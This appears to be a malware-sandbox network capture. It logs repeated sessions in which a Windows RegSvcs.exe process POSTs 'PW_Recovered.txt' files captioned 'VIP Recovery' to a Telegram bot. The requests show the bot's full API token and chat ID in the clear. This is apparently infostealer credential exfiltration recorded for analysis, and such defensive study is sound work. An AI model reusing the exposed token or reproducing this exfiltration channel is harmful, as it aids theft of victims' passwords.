                                                                          2024-09-19 10:24:12 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12819,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          92192.168.2.561660149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:14 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf9f7d1a9f0d8
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:14 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 66 37 64 31 61 39 66 30 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf9f7d1a9f0d8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:14 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:14 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:14 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12820,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          93192.168.2.561662149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:16 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf9041216e2b7
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:16 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 30 34 31 32 31 36 65 32 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf9041216e2b7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:17 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:17 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:17 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12822,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          94192.168.2.561663149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:17 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcfc29d9a5caca
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:17 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 32 39 64 39 61 35 63 61 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcfc29d9a5cacaContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:18 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:17 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:18 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12823,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          95192.168.2.561666149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:20 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcfe505b5a8452
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:20 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 65 35 30 35 62 35 61 38 34 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcfe505b5a8452Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:20 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:20 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:20 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12824,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          96192.168.2.561667149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:21 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf98f7b2e35ed
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:21 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 38 66 37 62 32 65 33 35 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf98f7b2e35edContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:21 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:21 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:21 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12825,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          97192.168.2.561670149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:24 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcfed3182d0166
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:24 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 65 64 33 31 38 32 64 30 31 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcfed3182d0166Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:25 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:24 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:25 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12826,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          98192.168.2.561671149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:25 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcfa10ca850f14
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:25 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 31 30 63 61 38 35 30 66 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcfa10ca850f14Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:25 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:25 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
